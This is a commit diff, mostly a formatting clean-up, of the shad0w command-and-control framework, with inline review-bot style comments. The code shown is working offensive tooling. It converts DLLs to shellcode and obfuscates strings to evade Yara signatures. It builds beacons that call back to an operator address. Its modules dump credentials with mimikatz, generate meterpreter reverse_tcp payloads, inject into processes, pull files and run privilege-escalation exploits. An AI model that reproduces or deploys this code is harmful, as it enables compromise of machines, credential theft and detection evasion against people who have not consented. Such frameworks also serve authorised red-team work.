tidy code up

L1ghtn1ng 2021-01-18 22:22:15 +00:00
parent afede223b5
commit 4890df575c
54 changed files with 344 additions and 171 deletions


@ -7,8 +7,9 @@ if sys.version_info < (3,0):
import struct
from struct import pack
MACHINE_IA64=512
MACHINE_AMD64=34404
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def is64BitDLL(bytes):
header_offset = struct.unpack("<L", bytes[60:64])[0]
@ -16,16 +17,18 @@ def is64BitDLL(bytes):
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
return True
return False
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
def HashFunctionName(name, module = None):
def HashFunctionName(name, module=None):
function = name.encode() + b'\x00'
if(module):
if module:
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
functionHash = 0
@ -53,6 +56,7 @@ def HashFunctionName(name, module = None):
return functionHash
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
#MARKER:S
@ -139,7 +143,8 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# User data
return bootstrap + rdiShellcode + dllBytes + userData
else: # 32 bit
else:
# 32 bit
rdiShellcode = rdiShellcode32
bootstrap = b''


@ -1,17 +1,20 @@
import string
import random
def gen_rand_filename():
name = ""
for i in range(1, 10):
name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase))
return name
def get_size(filename):
with open(filename, "rb") as file:
length = len(file.read())
return length
def clean_hex_output(hex_bytes):
raw_crypt_bytes = b""
for byte in hex_bytes.split():
@ -25,17 +28,20 @@ def clean_hex_output(hex_bytes):
raw_crypt_bytes += bytes.fromhex(byte)
return raw_crypt_bytes
def prepare_pe_image(bytes_len, data):
pe_image = f"#define array_len {bytes_len}\n\n"
pe_image = f"#define array_len {bytes_len}\n\n"
pe_image += "unsigned long long image_crypt[] = {\n"
pe_image += data
pe_image += "\n};"
return pe_image
def write_pe_image(path, pe_image):
with open(path, "w") as file:
file.write(pe_image)
def write_header_file(path, keys_used, jmp=False, runpe=False):
headerfile = ""
with open(path, "w") as file:
@ -48,6 +54,7 @@ def write_header_file(path, keys_used, jmp=False, runpe=False):
headerfile += "void RunFromMemory(char* pImage, char* pPath);\n"
file.write(headerfile)
def write_decrypt(path, loops, enc_type="xor"):
first_run = False
to_write = ""
@ -88,6 +95,7 @@ def write_decrypt(path, loops, enc_type="xor"):
return safe
def clean_up(path, clean):
with open(path, "w") as file:
file.write(clean)


@ -1,5 +1,6 @@
import random
class Banner(object):
def __init__(self):
super(Banner, self).__init__()
@ -103,4 +104,4 @@ class Banner(object):
'''` ";;;.
"""
self.banners = [banner4, banner1, banner2, banner3]
self.banners = [banner4, banner1, banner2, banner3]


@ -19,6 +19,7 @@ static_warning = """Static payloads can be very large and much easier to detect.
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
"""
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
# move the source files of the beacon over to the build directory
@ -36,6 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
return
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
# update the settings so that when we build, we will use our new args
@ -63,6 +65,7 @@ def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
return
def _crypt_string(raw_string, key):
# xor encrypt a string with a provided key
crypt_string = ""
@ -71,10 +74,12 @@ def _crypt_string(raw_string, key):
return base64.b64encode(crypt_string.encode())
def _gen_key(name):
key = hex(random.randint(0, 100))
return f"#define {name}_KEY {key}", key
def _crypt_strings():
# encrypt strings so they are not hanging around in the binary waiting to be
# thrown into a Yara rule. This is obfuscation not encryption
@ -103,7 +108,6 @@ def _crypt_strings():
return
def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=None, modlocation="/root/shad0w/beacon/beacon.exe", debug=False, make_target=None):
# build the beacon from the source files, making sure to
# obey the correct payload settings that we have been given
@ -121,7 +125,8 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
# remove the old file
try:
os.unlink(modlocation)
except: pass
except:
pass
# make sure we in the correct build dir
os.chdir(builddir)
@ -161,6 +166,7 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
return True
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
# use Donut or srdi to extract the shellcode from our newly created beacon
@ -192,6 +198,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
return code
def write_and_bridge(filename, rcode, noremove=False):
# write the supplied code to the file given
# by the user and then make sure they can access it
@ -210,6 +217,7 @@ def write_and_bridge(filename, rcode, noremove=False):
return len(rcode)
def raise_issue_payload(string):
# throw an error with the payload string
@ -218,6 +226,7 @@ def raise_issue_payload(string):
# exit with error code
exit(-1)
def get_payload_variables(payload_string, warn=True):
global secure_warning, static_warning
@ -271,6 +280,7 @@ def get_payload_variables(payload_string, warn=True):
# return our generated args
return arch, platform, secure, static
def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, exploit=False):
# make the build process quicker for modules
@ -304,6 +314,7 @@ def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, expl
# give the shellcode back
return rcode
def shellcode_to_array(data):
length = 0
line_len = 0
@ -389,6 +400,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
with open(stagefile, "w+") as file:
file.write(stage_template)
def _random_string(length):
rstring = ""
alphabet = string.ascii_lowercase + string.ascii_uppercase
@ -398,6 +410,7 @@ def _random_string(length):
return rstring
def shrink_exe(name):
os.system(f"strip {name} 1>/dev/null 2>&1")
os.system(f"upx --brute {name} 1>/dev/null 2>&1")
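Review bot: The cleanup around `os.unlink(modlocation)` in make_in_clone (hunk at `-121,7`) is still a bare `except:`, only moved onto two lines, so it also swallows KeyboardInterrupt, SystemExit and permission errors that would explain why a stale build artifact is still on disk. Narrow it to the one case that is expected, `except FileNotFoundError:` followed by `pass`. The same bare handler is reformatted rather than fixed around `os.unlink("/tmp/sharpsocks.log")` in start_sharpsocks_server further down this commit. make_in_clone's body continues outside the hunk, so this is based on the visible lines only.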


@ -5,6 +5,7 @@ from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, \
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
class Shad0wLexer(RegexLexer):
name = 'shad0w'
aliases = ['shad0w']


@ -2,6 +2,7 @@ __description__ = "Go back to the initial shell"
__author__ = "@HashtagMarkus"
__type__ = "beacon"
def main(shad0w, args):
# check we actually have a beacon


@ -8,6 +8,7 @@ __description__ = "Interact with or display current beacons"
__author__ = "@_batsec_"
__type__ = "beacon"
def _list_beacons(shad0w):
# I have gcse english, I gonna use it
if shad0w.beacon_count == 1:
@ -22,15 +23,15 @@ def _list_beacons(shad0w):
# stuff we will display
# beacon number
num = shad0w.beacons[beacon]["num"]
num = shad0w.beacons[beacon]["num"]
# get last check in time
checkin = shad0w.beacons[beacon]["last_checkin"]
checkin = shad0w.beacons[beacon]["last_checkin"]
# stuff to format for name
domain = shad0w.beacons[beacon]["domain"]
username = shad0w.beacons[beacon]["username"]
machine = shad0w.beacons[beacon]["machine"]
domain = shad0w.beacons[beacon]["domain"]
username = shad0w.beacons[beacon]["username"]
machine = shad0w.beacons[beacon]["machine"]
# format of name
if domain != "NULL":
@ -44,7 +45,6 @@ def _list_beacons(shad0w):
print(t)
return
def _interact_beacon(shad0w, args):
# get beacon number
@ -54,7 +54,7 @@ def _interact_beacon(shad0w, args):
try:
interact_with = int(interact_with)
except ValueError:
shad0w.debug.log(f"'{interact_with}' is an invaild beacon", log=True)
shad0w.debug.log(f"'{interact_with}' is an invalid beacon", log=True)
return
# match the beacon number to the id and then set the current id as that


@ -41,13 +41,13 @@ def generate_beacon_code(shad0w, beacon):
buildtools.update_settings_file(None, custom_template=settings_template)
if beacon is None:
os = shad0w.beacons[shad0w.current_beacon]["os"]
os_ = shad0w.beacons[shad0w.current_beacon]["os"]
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
else:
arch, arch, secure, _ = buildtools.get_payload_variables(beacon)
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
buildtools.make_in_clone(arch=arch, platform=os_, secure=secure, static=True)
return buildtools.extract_shellcode()
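Review bot: In the `else` branch of generate_beacon_code the unpacking `arch, arch, secure, _ = buildtools.get_payload_variables(beacon)` binds `arch` twice and never binds `os_`, so the following call with `platform=os_` raises UnboundLocalError whenever `beacon` is not None. get_payload_variables ends with `return arch, platform, secure, static` in the buildtools section of this commit, so the second target should be the platform name: `arch, os_, secure, _ = buildtools.get_payload_variables(beacon)`. The old name `os` had the same problem, and the rename touched the neighbouring lines without correcting it. The function starts above the hunk, so anything before line 41 is not covered by this note.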


@ -11,7 +11,7 @@ __description__ = "Show the contents of a file on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_LS = 0x2000
ERROR = False
@ -23,22 +23,24 @@ def error(message):
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def cat_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
usage_examples = """
Don't try to cat binary files, it doesnt work very well.
@ -82,4 +84,4 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = cat_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -9,21 +9,23 @@ __description__ = "Change the working directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_CD = 0x6000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def get_list_directory(rargs, args):
# resolve the directory we need to list
@ -46,6 +48,7 @@ def cd_callback(shad0w, data):
return ""
def main(shad0w, args):
# save the raw args
@ -64,11 +67,11 @@ Examples:
cd C:\\
cd "C:\\Documents and Settings"
"""
parse = argparse.ArgumentParser(prog='ls',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -97,4 +100,4 @@ cd "C:\\Documents and Settings"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = cd_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
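Review bot: The `exit` helper is rewritten here to `if message is not None:` but the identical helper is left as `if message != None: print(message)` plus a redundant `return` in several other sections of this commit (among them the ones defining cat_callback, ls_callback, rm_callback, mimikatz_callback, psh_callback, ghostinthelogs_callback and sharpsocks_callback). Apply the same two-line form everywhere, or move `error`/`exit` into one shared helper so the copies cannot drift again. Separately, the parser in this module's `main` is still created with `prog='ls'` although the examples are `cd C:\\`, which looks like a copy from the ls module; `prog='cd'` would make the usage text match the command.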


@ -15,16 +15,18 @@ DIE_ID = 0x6000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def main(shad0w, args):
# check we actually have a beacon


@ -10,6 +10,7 @@ __type__ = "enumeration"
EXEC_ID = 0x3000
def format_data(shad0w, data):
data = data.splitlines()
@ -25,6 +26,7 @@ def format_data(shad0w, data):
if "v" in line:
shad0w.debug.log(f"-\t{line}", log=True, pre=False)
def dotnet_callback(shad0w, data):
# well its kind of true
if "v" not in data:
@ -60,4 +62,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)


@ -21,15 +21,17 @@ error_list = ""
# name of the file to download
FILE_TO_DOWNLOAD = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def download_callback(shad0w, data):
global FILE_TO_DOWNLOAD
@ -74,8 +76,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# init the parser
parse = argparse.ArgumentParser(prog='download',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -89,10 +91,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
print(error_list)
parse.print_help()
return
@ -101,10 +103,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# make this variable global so the call back can access it
FILE_TO_DOWNLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)
@ -112,7 +114,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '')
# clone all the source files
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/", builddir="/root/shad0w/modules/windows/download/build")
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/",
builddir="/root/shad0w/modules/windows/download/build")
# set the correct settings
template = """#define _C2_CALLBACK_ADDRESS L"%s"
@ -125,14 +128,17 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
#define DO_CALLBACK 0x4000
#define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, read_file)
buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/download/build/settings.h")
buildtools.update_settings_file(None, custom_template=template,
custom_path="/root/shad0w/modules/windows/download/build/settings.h")
# compile the module
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build", modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build",
modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe", want_base64=True)
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
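Review bot: The `args = parse.parse_args(args[1:])` call in the hunk at `-89,10` is still wrapped in a bare `except:` with `pass`, and when parsing does raise, `args` is still the raw list, so the next statement `len(args.file)` fails with AttributeError instead of printing the help. With `parse.exit` and `parse.error` replaced I cannot tell from the hunk which exception is expected, so the minimal change is `except Exception:` followed by `print(error_list)`, `parse.print_help()` and `return`, so a failed parse never reaches the code below. main's body starts and ends outside the visible hunks.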


@ -18,15 +18,17 @@ ERROR = False
error_list = ""
RAN_COMMAND = False
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def list_exploits(shad0w):
sys.path.append("/root/shad0w/exploits/")
@ -42,6 +44,7 @@ def list_exploits(shad0w):
print(t)
def show_details(shad0w, name):
sys.path.append("/root/shad0w/exploits/")
all_exploits = importlib.import_module("__init__").__all__
@ -56,8 +59,11 @@ def show_details(shad0w, name):
arch = importlib.import_module(exploit.replace("/", ".")).__description__["Arch"]
secure = importlib.import_module(exploit.replace("/", ".")).__description__["Secure"]
if secure: secure = "Yes"
else: secure = "No"
if secure:
secure = "Yes"
else:
secure = "No"
shad0w.debug.log("Exploit details:\n", log=True)
shad0w.debug.log(f"Name: {exploit_name}", log=True, pre=False)
@ -68,6 +74,7 @@ def show_details(shad0w, name):
shad0w.debug.log(f"Arch: {arch}", log=True, pre=False)
shad0w.debug.log(f"Supports Secure: {secure}", log=True, pre=False)
def check_exploit(shad0w, name, arch):
# run the exploit in check mode
@ -79,6 +86,7 @@ def check_exploit(shad0w, name, arch):
if name == exploit_name:
importlib.import_module(exploit.replace("/", ".")).check(shad0w, arch)
def use_exploit(shad0w, name, arch):
# run the exploit in exploit mode
@ -91,6 +99,7 @@ def use_exploit(shad0w, name, arch):
exploit_mod = importlib.import_module(exploit.replace("/", "."))
threading.Thread(target=exploit_mod.exploit, args=(shad0w, arch)).start()
def main(shad0w, args):
global RAN_COMMAND
@ -113,8 +122,8 @@ elevate --smart
# init the parser
parse = argparse.ArgumentParser(prog='elevate',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -163,4 +172,3 @@ elevate --smart
if RAN_COMMAND == False:
parse.print_help()
return
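Review bot: Style only: the expanded `if secure:` / `else:` pair in show_details reads more directly as `secure = "Yes" if secure else "No"`, and the last hunk still compares with `if RAN_COMMAND == False:` where `if not RAN_COMMAND:` would match the `is not None` clean-up done to `exit` in the same file. show_details also calls `importlib.import_module(exploit.replace("/", "."))` once per field in the visible lines; binding the module to a local once and reading `__description__` from it would be shorter and easier to follow.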


@ -2,12 +2,13 @@
# exit shad0w
#
import os, signal
import sys
__description__ = "Exit shad0w C2"
__author__ = "@_batsec_"
__type__ = "system"
def main(shad0w, args):
# Once we have logging we will probably want to make a more sophisticated exit routine
os.sys.exit(0)
sys.exit(0)
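Review bot: `import os, signal` is left as a combined import next to the new `import sys`; PEP 8 asks for one module per line, and with the call changed to `sys.exit(0)` nothing in the visible lines uses `os` or `signal` any more. If the rest of the file does not use them either, drop both so the header is just `import sys`.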


@ -8,14 +8,16 @@ __description__ = "Show current process info"
__author__ = "@_batsec_"
__type__ = "process"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PID = 0x7000
def pid_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -29,4 +31,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = pid_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -25,17 +25,18 @@ RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def ghostinthelogs_callback(shad0w, data):
data = data.replace("[+]", "\033[1;32m[+]\033[0m")
data = data.replace("[!]", "\033[1;31m[!]\033[0m")
@ -47,6 +48,7 @@ def ghostinthelogs_callback(shad0w, data):
return ""
def set_and_send(shad0w, args):
args.cls = False
args.method = False
@ -65,6 +67,7 @@ def set_and_send(shad0w, args):
return
def main(shad0w, args):
raw_args = args


@ -10,6 +10,7 @@ __description__ = "Show help information"
__author__ = "@_batsec_"
__type__ = "system"
def usage(shad0w):
t = PrettyTable(["Type", "Command", "Description"])
@ -28,7 +29,7 @@ def usage(shad0w):
try:
description = mod.__description__
except:
except Exception:
description = "No description available."
t.add_row([type, command, description])
@ -37,6 +38,7 @@ def usage(shad0w):
return t
def main(shad0w, args):
info = usage(shad0w)
shad0w.debug.log(info, pre=False, log=True)
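Review bot: `except Exception:` around `description = mod.__description__` in usage() is narrower than the bare `except:` it replaces but still hides every failure other than the missing attribute. `description = getattr(mod, "__description__", "No description available.")` does the same job without a handler. The row built just below passes a local called `type`, which shadows the builtin; a name such as `mod_type` avoids that, though its assignment is outside the hunk.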


@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of lockless binary
LOCKLESS_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/LockLess.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def lockless_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -15,16 +15,18 @@ OPCODE_LS = 0x1000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def get_list_directory(rargs, args):
# resolve the directory we need to list
@ -46,6 +48,7 @@ def ls_callback(shad0w, data):
return ""
def main(shad0w, args):
# save the raw args
@ -67,9 +70,9 @@ ls "C:\\Documents and Settings"
"""
parse = argparse.ArgumentParser(prog='ls',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -99,4 +102,4 @@ ls "C:\\Documents and Settings"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = ls_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -12,19 +12,19 @@ __type__ = "module"
EXEC_ID = 0x3000
class DummyClass(object):
def __init__(self):
pass
# Let argparse error and exit nice
def error(message):
#global ERROR, error_list
#ERROR = True
print(f"\033[0;31m{message}\033[0m\n")
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
@ -66,7 +66,7 @@ def main(shad0w, args):
# Setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp", required=False, default="windows/x64/meterpreter/reverse_tcp")
# Make sure we don't die from weird args
try:
@ -85,7 +85,7 @@ def main(shad0w, args):
return
# Generate and read the msfvenom shellcode
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
rcode = msfvenom_payload_gen(shad0w, payload=args.payload, lport=args.port, lhost=args.host, arch="x64")
# Set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)


@ -21,15 +21,17 @@ DLLINJECT_EXEC_ID = 0x5000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def build_inject_info(args, rcode):
@ -43,6 +45,7 @@ def build_inject_info(args, rcode):
return json.dumps(info)
def generate_beacon_code(shad0w):
buildtools.clone_source_files(rootdir='injectable')
@ -63,6 +66,7 @@ def generate_beacon_code(shad0w):
return buildtools.extract_shellcode()
def format_shellcode(shellcode):
hshellcode = ""
@ -76,6 +80,7 @@ def format_shellcode(shellcode):
return hshellcode
def write_header(code, file_loc):
hex_code = format_shellcode(code)
@ -90,12 +95,14 @@ unsigned int beacon_bin_len = %s;
return
def get_dll_data(file_loc):
with open(file_loc, "rb") as file:
data = file.read()
return base64.b64encode(data).decode()
def generate_beacon_dll(shad0w, rcode):
# write header file
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
@ -105,13 +112,14 @@ def generate_beacon_dll(shad0w, rcode):
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
# check that the dll has built
if made != True:
if made is not True:
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def await_impersonate(shad0w, pid):
while True:
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
@ -128,6 +136,7 @@ def await_impersonate(shad0w, pid):
shad0w.debug.good(f"Successfully migrated ({pid})")
return
def main(shad0w, args):
# check we actually have a beacon
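Review bot: `if made is not True:` in generate_beacon_dll keeps the comparison against a literal and now also treats any truthy non-bool return as a failure; the visible success path of make_in_clone is `return True`, so `if not made:` says the same thing idiomatically. On failure the function falls through to a bare `return`, so callers receive None instead of the base64 string and have to check for it; a docstring line stating that would help. await_impersonate in the next hunk still has `== None` on the `impersonate` lookup, which should become `is None` to match the rest of this commit.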


@ -20,17 +20,18 @@ MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def mimikatz_callback(shad0w, data):
data = data.replace(".#####.", "\033[1;32m.#####.\033[0m")
data = data.replace(".## ^ ##.", "\033[1;32m.##\033[0m \033[1;39m^\033[0m \033[1;32m##.\033[0m")
@ -43,6 +44,7 @@ def mimikatz_callback(shad0w, data):
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -101,4 +103,4 @@ mimikatz -x sekurlsa::logonpasswords
b64_comp_data = shellcode.generate(MIMIKATZ_BIN, args, params)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback


@ -9,7 +9,7 @@ __description__ = "Create a new directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_MKDIR = 0x5000
ERROR = False
@ -21,9 +21,11 @@ def error(message):
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def mkdir_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)


@ -9,14 +9,16 @@ __description__ = "Show running processes"
__author__ = "@_batsec_"
__type__ = "process"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PID = 0x8000
def ps_callback(shad0w, data):
sys.stdout.write(data)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -30,4 +32,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = ps_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -28,21 +28,24 @@ error_list = ""
# make the command output a bit cleaner
FIRST_OUTPUT = True
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def psh_callback(shad0w, data):
global FIRST_OUTPUT
@ -59,9 +62,11 @@ def psh_callback(shad0w, data):
return ""
def encode_string(data):
return base64.b64encode(data.encode())
def random_string():
rstring = ""
alphabet = string.ascii_lowercase + string.ascii_uppercase
@ -71,10 +76,12 @@ def random_string():
return rstring
def do_copy():
os.system("cp /root/shad0w/modules/windows/psh/*.cs /root/shad0w/modules/windows/psh/build")
os.system("cp /root/shad0w/modules/windows/psh/*.dll /root/shad0w/modules/windows/psh/build")
def write_args(pwsh):
do_copy()
@ -90,6 +97,7 @@ def write_args(pwsh):
with open("/root/shad0w/modules/windows/psh/build/main.cs", "w") as file:
file.write(new_file)
def compile_binary():
cwd = os.getcwd()
@ -97,6 +105,7 @@ def compile_binary():
os.system("mcs /reference:System.Management.Automation.dll -out:psh.exe main.cs")
os.chdir(cwd)
def main(shad0w, args):
raw_args = args


@ -7,14 +7,16 @@ __description__ = "Show the current working directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PWD = 0x3000
def pwd_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -28,4 +30,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = pwd_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -15,21 +15,24 @@ OPCODE_RM = 0x4000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def rm_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# save the raw args
@ -48,9 +51,9 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
"""
parse = argparse.ArgumentParser(prog='rm',
